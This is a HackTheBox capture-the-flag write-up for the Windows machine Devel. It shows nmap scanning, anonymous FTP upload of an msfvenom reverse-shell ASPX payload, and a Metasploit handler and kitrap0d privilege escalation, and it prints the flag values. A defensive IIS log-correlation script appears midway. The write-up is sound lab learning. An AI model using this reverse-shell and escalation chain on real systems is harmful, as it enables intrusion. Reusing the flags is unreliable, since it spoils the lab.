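HackTheBox WriteUp: Devel
My third HackTheBox target.
Like the previous one, this was a Windows machine, but to be honest my skills were so lacking that I could barely make any progress on my own.
So for most of it I followed the walkthrough below.
https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-devel/
I wonder whether I'll eventually be able to solve machines like this on my own...
1. Enumeration
As usual, I started with nmap.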
```
kali@kali:~/SyachinekoLab/workspace/HTB/Devel$ sudo nmap -sS -sV -A -p 0-20000 --script vuln -T5 10.10.10.5
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-19 21:14 EDT
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.5
Host is up (0.34s latency).
Not shown: 19999 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
80/tcp open  http    Microsoft IIS httpd 7.5
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/7.5
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   139.20 ms 10.10.14.1
2   365.20 ms 10.10.10.5

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 737.76 seconds
```
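Two services were identified:
21/TCP FTP
80/TCP HTTP
Since an HTTP service was running, I also accessed http://10.10.10.5,
and the following site was displayed.
2. Intrusion
I attempted to break into the services that had been identified.
For FTP, I tried whether I could connect with simple user names and the like.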
```
kali@kali:~/SyachinekoLab/workspace/HTB/Devel$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:kali): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.
ftp>
kali@kali:~/SyachinekoLab/workspace/HTB/Devel$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.
ftp>
```
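As a result, I was able to log in with the ftp/ftp combination.
Logging in as anonymous also succeeded.
Since a web server was also running,
I decided to set up a reverse shell by combining it with FTP.
The payload for the reverse shell
was created with msfvenom.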
```
kali@kali:~/SyachinekoLab/workspace/HTB/Devel$ msfvenom -p windows/meterpreter/reverse_tcp -f aspx -o devel.aspx LHOST=10.10.14.9 LPORT=1234
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2834 bytes
Saved as: devel.aspx
```
I sent this to the machine over FTP.
```
kali@kali:~/SyachinekoLab/workspace/HTB/Devel$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:kali): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put devel.aspx
local: devel.aspx remote: devel.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2870 bytes sent in 0.00 secs (23.5952 MB/s)
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
06-30-20  12:41AM                 2870 devel.aspx
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.
ftp>
```
After that, I established the reverse shell connection from the Metasploit side.
```
kali@kali:~/SyachinekoLab/workspace/HTB/Devel$ msfconsole
[!] The following modules were loaded with warnings:
[!]     /usr/share/metasploit-framework/modules/exploits/19671.rb
[!] Please see /home/kali/.msf4/logs/framework.log for details.

 ,           ,
/             \
((__---,,,---__))
   (_) O O (_)_________
      \ _ /            |\
       o_o \   M S F   | \
            \   _____  |  *
             |||   WW|||
             |||     |||

       =[ metasploit v5.0.85-dev                          ]
+ -- --=[ 2003 exploits - 1093 auxiliary - 342 post       ]
+ -- --=[ 560 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Display the Framework log using the log command, learn more with help log

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set payload
Display all 519 possibilities? (y or n)
msf5 exploit(multi/handler) > set payload windows/meterpreter
set payload windows/meterpreter/bind_hidden_ipknock_tcp    set payload windows/meterpreter/reverse_nonx_tcp
set payload windows/meterpreter/bind_hidden_tcp            set payload windows/meterpreter/reverse_ord_tcp
set payload windows/meterpreter/bind_ipv6_tcp              set payload windows/meterpreter/reverse_tcp
set payload windows/meterpreter/bind_ipv6_tcp_uuid         set payload windows/meterpreter/reverse_tcp_allports
set payload windows/meterpreter/bind_named_pipe            set payload windows/meterpreter/reverse_tcp_dns
set payload windows/meterpreter/bind_nonx_tcp              set payload windows/meterpreter/reverse_tcp_rc4
set payload windows/meterpreter/bind_tcp                   set payload windows/meterpreter/reverse_tcp_rc4_dns
set payload windows/meterpreter/bind_tcp_rc4               set payload windows/meterpreter/reverse_tcp_uuid
set payload windows/meterpreter/bind_tcp_uuid              set payload windows/meterpreter/reverse_winhttp
set payload windows/meterpreter/reverse_hop_http           set payload windows/meterpreter/reverse_winhttps
set payload windows/meterpreter/reverse_http               set payload windows/meterpreter_bind_named_pipe
set payload windows/meterpreter/reverse_http_proxy_pstore  set payload windows/meterpreter_bind_tcp
set payload windows/meterpreter/reverse_https              set payload windows/meterpreter_reverse_http
set payload windows/meterpreter/reverse_https_proxy        set payload windows/meterpreter_reverse_https
set payload windows/meterpreter/reverse_ipv6_tcp           set payload windows/meterpreter_reverse_ipv6_tcp
set payload windows/meterpreter/reverse_named_pipe         set payload windows/meterpreter_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set LHOST 10.10.14.9
LHOST => 10.10.14.9
msf5 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.9:1234
[*] Sending stage (180291 bytes) to 10.10.10.5
[*] Meterpreter session 2 opened (10.10.14.9:1234 -> 10.10.10.5:49163) at 2020-06-26 09:56:55 -0400

meterpreter >
```
Note that, while the handler was waiting for the session,
I accessed http://10.10.10.5/devel.aspx from the browser to establish the reverse shell.
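Seen from the defender's side, the chain above (an FTP upload of an .aspx file into the web root, followed by an HTTP request for that file) is visible in the IIS logs. The following is an added example, not part of the original write-up, that correlates the FTP and HTTP W3C logs to surface it. The log lines are constructed samples, and the extension list, the 24-hour window and the mapping of the FTP root onto the web root are assumptions of this example.

```python
import posixpath
from datetime import datetime, timedelta

# Constructed sample logs (not taken from the target). IIS writes W3C extended
# logs whose "#Fields:" directive names the columns, so the parser reads that
# directive instead of hard-coding column positions.
FTP_LOG = """\
#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2020-06-30 00:41:02 10.10.14.9 anonymous STOR devel.aspx 226
2020-06-30 00:41:30 10.10.14.9 anonymous STOR notes.txt 226
2020-06-30 00:42:10 10.10.14.9 anonymous STOR blocked.aspx 550
"""
HTTP_LOG = """\
#Fields: date time cs-method cs-uri-stem c-ip sc-status
2020-06-30 00:39:00 GET /devel.aspx 10.10.14.9 404
2020-06-30 00:40:00 GET /iisstart.htm 10.10.14.9 200
2020-06-30 00:43:15 GET /devel.aspx 10.10.14.9 200
"""

SCRIPT_EXTS = {".asp", ".aspx", ".ashx", ".asmx", ".cshtml"}  # run by IIS/ASP.NET
UPLOAD_CMDS = {"STOR", "STOU", "APPE"}                        # FTP write commands
WINDOW = timedelta(hours=24)                                  # assumed correlation window


def parse_w3c(text):
    """Yield one dict per log entry, keyed by the names in the #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.strip() and not line.startswith("#") and fields:
            row = dict(zip(fields, line.split()))
            row["ts"] = datetime.strptime(f"{row['date']} {row['time']}", "%Y-%m-%d %H:%M:%S")
            yield row


def web_path(stem):
    """Normalise a logged path; assumes the FTP root is the web root, as on this box."""
    return "/" + stem.replace("\\", "/").lstrip("/").lower()


def find_upload_then_request(ftp_text, http_text):
    """Return HTTP requests for script files that were earlier uploaded over FTP."""
    uploads = {}
    for r in parse_w3c(ftp_text):
        path = web_path(r["cs-uri-stem"])
        if (r["cs-method"].upper() in UPLOAD_CMDS and r["sc-status"] == "226"
                and posixpath.splitext(path)[1] in SCRIPT_EXTS):
            uploads.setdefault(path, r)  # keep the earliest successful upload
    findings = []
    for r in parse_w3c(http_text):
        up = uploads.get(web_path(r["cs-uri-stem"]))
        if up and timedelta(0) <= r["ts"] - up["ts"] <= WINDOW:
            findings.append({
                "path": web_path(r["cs-uri-stem"]),
                "ftp_user": up["cs-username"],
                "uploaded_from": up["c-ip"],
                "uploaded_at": up["ts"],
                "requested_from": r["c-ip"],
                "requested_at": r["ts"],
                "http_status": r["sc-status"],
            })
    return findings


if __name__ == "__main__":
    for f in find_upload_then_request(FTP_LOG, HTTP_LOG):
        print(f"ALERT {f['path']}: FTP upload by {f['ftp_user']} from {f['uploaded_from']} "
              f"at {f['uploaded_at']}, then HTTP {f['http_status']} to {f['requested_from']} "
              f"at {f['requested_at']}")
```

The underlying fix is configuration rather than detection: anonymous FTP should not have write access to a directory that IIS serves with script execution enabled.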
I checked with the following commands, but did not obtain any useful information.
```
meterpreter > search -f user.txt
No files matching your search were found.
meterpreter > shell
Process 3820 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>systeminfo
systeminfo

Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:
Product ID:                55041-051-0948536-86302
Original Install Date:     17/3/2017, 4:17:31
System Boot Time:          29/6/2020, 11:07:23
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     1.023 MB
Available Physical Memory: 688 MB
Virtual Memory: Max Size:  2.047 MB
Virtual Memory: Available: 1.525 MB
Virtual Memory: In Use:    522 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.5

c:\windows\system32\inetsrv>
```
3. Privilege escalation
I used Metasploit to determine whether privilege escalation was possible.
```
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf5 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 30 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
msf5 post(multi/recon/local_exploit_suggester) >
```
Of these, I used exploit/windows/local/ms10_015_kitrap0d to escalate privileges.
```
meterpreter > background
[*] Backgrounding session 3...
msf5 exploit(multi/handler) > show sessions

Active sessions
===============

  Id  Name  Type                     Information              Connection
  --  ----  ----                     -----------              ----------
  3         meterpreter x86/windows  IIS APPPOOL\Web @ DEVEL  10.10.14.9:1234 -> 10.10.10.5:49157 (10.10.10.5)

msf5 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d
msf5 exploit(windows/local/ms10_015_kitrap0d) > show options

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  2                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.9       yes       The listen address (an interface may be specified)
   LPORT     1234             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 2K SP4 - Windows 7 (x86)


msf5 exploit(windows/local/ms10_015_kitrap0d) > set session 3
session => 3
msf5 exploit(windows/local/ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on 10.10.14.9:1234
[*] Launching notepad to host the exploit...
[+] Process 1672 launched.
[*] Reflectively injecting the exploit DLL into 1672...
[*] Injecting exploit into 1672 ...
[*] Exploit injected. Injecting payload into 1672...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (180291 bytes) to 10.10.10.5
[*] Meterpreter session 4 opened (10.10.14.9:1234 -> 10.10.10.5:49158) at 2020-06-26 10:38:36 -0400

meterpreter > ls
Listing: c:\windows\system32\inetsrv
====================================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
100666/rw-rw-rw-  138752   fil   2009-07-13 20:11:35 -0400  AppHostNavigators.dll
100777/rwxrwxrwx  125440   fil   2009-07-13 20:10:51 -0400  InetMgr.exe
100666/rw-rw-rw-  126976   fil   2009-07-13 18:39:34 -0400  Microsoft.Web.Administration.dll
100666/rw-rw-rw-  1048576  fil   2009-07-13 18:39:42 -0400  Microsoft.Web.Management.dll
100666/rw-rw-rw-  137728   fil   2009-07-13 20:11:35 -0400  XPath.dll
100777/rwxrwxrwx  155648   fil   2009-07-13 20:11:25 -0400  appcmd.exe
100666/rw-rw-rw-  3654     fil   2009-06-10 17:17:16 -0400  appcmd.xml
100666/rw-rw-rw-  61440    fil   2009-07-13 20:11:12 -0400  apphostsvc.dll
100666/rw-rw-rw-  313856   fil   2009-07-13 20:11:17 -0400  appobj.dll
100666/rw-rw-rw-  389632   fil   2009-07-13 20:11:14 -0400  asp.dll
100666/rw-rw-rw-  22196    fil   2009-07-13 17:04:57 -0400  asp.mof
100777/rwxrwxrwx  195584   fil   2009-07-13 20:11:42 -0400  aspnetca.exe
100666/rw-rw-rw-  22528    fil   2009-07-13 20:10:58 -0400  asptlb.tlb
100666/rw-rw-rw-  32256    fil   2009-07-13 20:11:17 -0400  authanon.dll
100666/rw-rw-rw-  48640    fil   2009-07-13 20:11:01 -0400  browscap.dll
100666/rw-rw-rw-  33404    fil   2017-03-17 10:37:32 -0400  browscap.ini
100666/rw-rw-rw-  17408    fil   2009-07-13 20:11:22 -0400  cachfile.dll
100666/rw-rw-rw-  44544    fil   2009-07-13 20:11:28 -0400  cachhttp.dll
100666/rw-rw-rw-  10240    fil   2009-07-13 20:11:27 -0400  cachtokn.dll
100666/rw-rw-rw-  9728     fil   2009-07-13 20:11:27 -0400  cachuri.dll
100666/rw-rw-rw-  43520    fil   2009-07-13 20:11:22 -0400  compstat.dll
40777/rwxrwxrwx   4096     dir   2017-03-17 10:37:32 -0400  config
100666/rw-rw-rw-  41984    fil   2009-07-13 20:11:21 -0400  custerr.dll
100666/rw-rw-rw-  19456    fil   2009-07-13 20:11:22 -0400  defdoc.dll
100666/rw-rw-rw-  23552    fil   2009-07-13 20:11:22 -0400  dirlist.dll
40777/rwxrwxrwx   4096     dir   2017-03-17 10:37:32 -0400  en-US
100666/rw-rw-rw-  55808    fil   2009-07-13 20:11:24 -0400  filter.dll
100666/rw-rw-rw-  16384    fil   2009-07-13 20:11:29 -0400  ftpconfigext.dll
100666/rw-rw-rw-  9728     fil   2009-07-13 20:11:28 -0400  ftpctrlps.dll
100666/rw-rw-rw-  10240    fil   2009-07-13 20:11:29 -0400  ftpmib.dll
100666/rw-rw-rw-  14848    fil   2009-07-13 20:11:29 -0400  ftpres.dll
100666/rw-rw-rw-  308224   fil   2009-07-13 20:11:36 -0400  ftpsvc.dll
100666/rw-rw-rw-  69252    fil   2009-07-13 18:40:37 -0400  ftpsvc.mof
100666/rw-rw-rw-  27136    fil   2009-07-13 20:10:58 -0400  gzip.dll
100666/rw-rw-rw-  22528    fil   2009-07-13 20:11:09 -0400  httpmib.dll
100666/rw-rw-rw-  12800    fil   2009-07-13 20:11:17 -0400  hwebcore.dll
100666/rw-rw-rw-  63105    fil   2009-07-13 18:39:38 -0400  iis.msc
100666/rw-rw-rw-  197632   fil   2009-07-13 20:11:24 -0400  iiscore.dll
100666/rw-rw-rw-  89088    fil   2009-07-13 20:11:33 -0400  iisreg.dll
100666/rw-rw-rw-  12288    fil   2009-07-13 20:11:26 -0400  iisreqs.dll
100666/rw-rw-rw-  220160   fil   2009-07-13 20:11:11 -0400  iisres.dll
100777/rwxrwxrwx  30720    fil   2009-07-13 20:11:04 -0400  iisrstas.exe
100777/rwxrwxrwx  240128   fil   2009-07-13 20:11:45 -0400  iissetup.exe
100666/rw-rw-rw-  59904    fil   2009-07-13 20:11:36 -0400  iissyspr.dll
100666/rw-rw-rw-  205824   fil   2009-07-13 20:11:15 -0400  iisutil.dll
100666/rw-rw-rw-  396288   fil   2009-07-13 20:11:15 -0400  iisw3adm.dll
100666/rw-rw-rw-  106496   fil   2009-07-13 20:11:24 -0400  isapi.dll
100666/rw-rw-rw-  19456    fil   2009-07-13 20:11:23 -0400  loghttp.dll
100666/rw-rw-rw-  39424    fil   2009-07-13 20:11:26 -0400  modrqflt.dll
100666/rw-rw-rw-  363008   fil   2009-07-13 20:11:24 -0400  nativerd.dll
100666/rw-rw-rw-  19968    fil   2009-07-13 20:11:24 -0400  protsup.dll
100666/rw-rw-rw-  26624    fil   2009-07-13 20:11:11 -0400  rsca.dll
100666/rw-rw-rw-  49664    fil   2009-07-13 20:11:14 -0400  rscaext.dll
100666/rw-rw-rw-  37888    fil   2009-07-13 20:11:28 -0400  static.dll
100666/rw-rw-rw-  18944    fil   2009-07-13 20:11:22 -0400  validcfg.dll
100666/rw-rw-rw-  9216     fil   2009-07-13 20:11:07 -0400  w3ctrlps.dll
100666/rw-rw-rw-  30208    fil   2009-07-13 20:11:09 -0400  w3ctrs.dll
100666/rw-rw-rw-  24064    fil   2009-07-13 20:11:18 -0400  w3dt.dll
100666/rw-rw-rw-  15872    fil   2009-07-13 20:11:15 -0400  w3tp.dll
100777/rwxrwxrwx  20480    fil   2009-07-13 20:11:23 -0400  w3wp.exe
100666/rw-rw-rw-  55296    fil   2009-07-13 20:11:16 -0400  w3wphost.dll
100666/rw-rw-rw-  23552    fil   2009-07-13 20:11:13 -0400  wbhst_pm.dll
100666/rw-rw-rw-  24064    fil   2009-07-13 20:11:09 -0400  wbhstipm.dll
```
After that, I searched for user.txt and root.txt and found them.
```
meterpreter > cd /
meterpreter > ls
Listing: c:\
============

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
40777/rwxrwxrwx   0      dir   2009-07-13 22:36:15 -0400  $Recycle.Bin
40777/rwxrwxrwx   0      dir   2009-07-14 00:53:55 -0400  Documents and Settings
40777/rwxrwxrwx   0      dir   2009-07-13 22:37:05 -0400  PerfLogs
40555/r-xr-xr-x   4096   dir   2009-07-13 22:37:05 -0400  Program Files
40777/rwxrwxrwx   4096   dir   2009-07-13 22:37:05 -0400  ProgramData
40777/rwxrwxrwx   0      dir   2017-03-17 10:17:30 -0400  Recovery
40777/rwxrwxrwx   8192   dir   2017-03-17 07:09:34 -0400  System Volume Information
40555/r-xr-xr-x   4096   dir   2009-07-13 22:37:05 -0400  Users
40777/rwxrwxrwx   16384  dir   2009-07-13 22:37:05 -0400  Windows
100777/rwxrwxrwx  24     fil   2009-07-13 22:04:04 -0400  autoexec.bat
100666/rw-rw-rw-  10     fil   2009-07-13 22:04:04 -0400  config.sys
40777/rwxrwxrwx   4096   dir   2017-03-17 10:37:31 -0400  inetpub
57211620/rw--w----  59948775560478703  fif  1908705379-07-18 19:36:16 -0500  pagefile.sys

meterpreter > cd Users
lmeterpreter > ls
Listing: c:\Users
=================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx   8192  dir   2017-03-17 19:16:43 -0400  Administrator
40777/rwxrwxrwx   0     dir   2009-07-14 00:53:55 -0400  All Users
40777/rwxrwxrwx   8192  dir   2017-03-17 19:06:26 -0400  Classic .NET AppPool
40555/r-xr-xr-x   8192  dir   2009-07-13 22:37:05 -0400  Default
40777/rwxrwxrwx   0     dir   2009-07-14 00:53:55 -0400  Default User
40555/r-xr-xr-x   4096  dir   2009-07-13 22:37:05 -0400  Public
40777/rwxrwxrwx   8192  dir   2017-03-17 10:17:37 -0400  babis
100666/rw-rw-rw-  174   fil   2009-07-14 00:41:57 -0400  desktop.ini

meterpreter > cd babis
lmeterpreter > ls
Listing: c:\Users\babis
=======================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   0       dir   2017-03-17 10:17:40 -0400  AppData
40777/rwxrwxrwx   0       dir   2017-03-17 10:17:40 -0400  Application Data
40555/r-xr-xr-x   0       dir   2017-03-17 10:17:44 -0400  Contacts
40777/rwxrwxrwx   0       dir   2017-03-17 10:17:40 -0400  Cookies
40555/r-xr-xr-x   0       dir   2017-03-17 10:17:40 -0400  Desktop
40555/r-xr-xr-x   4096    dir   2017-03-17 10:17:40 -0400  Documents
40555/r-xr-xr-x   0       dir   2017-03-17 10:17:40 -0400  Downloads
40555/r-xr-xr-x   4096    dir   2017-03-17 10:17:40 -0400  Favorites
40555/r-xr-xr-x   0       dir   2017-03-17 10:17:40 -0400  Links
40777/rwxrwxrwx   0       dir   2017-03-17 10:17:40 -0400  Local Settings
40555/r-xr-xr-x   0       dir   2017-03-17 10:17:40 -0400  Music
40777/rwxrwxrwx   0       dir   2017-03-17 10:17:40 -0400  My Documents
100666/rw-rw-rw-  524288  fil   2017-03-17 10:17:40 -0400  NTUSER.DAT
100666/rw-rw-rw-  65536   fil   2017-03-17 10:17:40 -0400  NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf
100666/rw-rw-rw-  524288  fil   2017-03-17 10:17:40 -0400  NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw-  524288  fil   2017-03-17 10:17:40 -0400  NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms
40777/rwxrwxrwx   0       dir   2017-03-17 10:17:40 -0400  NetHood
40555/r-xr-xr-x   0       dir   2017-03-17 10:17:40 -0400  Pictures
40777/rwxrwxrwx   0       dir   2017-03-17 10:17:40 -0400  PrintHood
40777/rwxrwxrwx   0       dir   2017-03-17 10:17:40 -0400  Recent
40555/r-xr-xr-x   0       dir   2017-03-17 10:17:40 -0400  Saved Games
40555/r-xr-xr-x   0       dir   2017-03-17 10:17:52 -0400  Searches
40777/rwxrwxrwx   0       dir   2017-03-17 10:17:40 -0400  SendTo
40777/rwxrwxrwx   0       dir   2017-03-17 10:17:40 -0400  Start Menu
40777/rwxrwxrwx   0       dir   2017-03-17 10:17:40 -0400  Templates
40555/r-xr-xr-x   0       dir   2017-03-17 10:17:40 -0400  Videos
100666/rw-rw-rw-  262144  fil   2017-03-17 10:17:40 -0400  ntuser.dat.LOG1
100666/rw-rw-rw-  0       fil   2017-03-17 10:17:40 -0400  ntuser.dat.LOG2
100666/rw-rw-rw-  20      fil   2017-03-17 10:17:40 -0400  ntuser.ini

meterpreter > cd Desktop
lsmeterpreter > ls
Listing: c:\Users\babis\Desktop
===============================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2017-03-17 10:17:51 -0400  desktop.ini
100444/r--r--r--  32    fil   2017-03-17 19:14:21 -0400  user.txt.txt

meterpreter > cat user.txt.txt
9ecdd6a3aedf24b41562fea70f4cb3e8meterpreter > cd ..
meterpreter > cd ..
meterpreter > ls
Listing: c:\Users
=================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx   8192  dir   2017-03-17 19:16:43 -0400  Administrator
40777/rwxrwxrwx   0     dir   2009-07-14 00:53:55 -0400  All Users
40777/rwxrwxrwx   8192  dir   2017-03-17 19:06:26 -0400  Classic .NET AppPool
40555/r-xr-xr-x   8192  dir   2009-07-13 22:37:05 -0400  Default
40777/rwxrwxrwx   0     dir   2009-07-14 00:53:55 -0400  Default User
40555/r-xr-xr-x   4096  dir   2009-07-13 22:37:05 -0400  Public
40777/rwxrwxrwx   8192  dir   2017-03-17 10:17:37 -0400  babis
100666/rw-rw-rw-  174   fil   2009-07-14 00:41:57 -0400  desktop.ini

meterpreter > cd Administrator
cdmeterpreter > cd Desktop
ls
meterpreter > ls
caListing: c:\Users\Administrator\Desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2017-03-17 19:16:53 -0400  desktop.ini
100444/r--r--r--  32    fil   2017-03-17 19:17:20 -0400  root.txt.txt

meterpreter > cat root.txt.txt
e621a0b5041708797c4fc4728bc72b4bmeterpreter >
```
I ended up relying on the walkthrough for most of it,
but in the end I learned a great deal, so it was worthwhile.
That's all.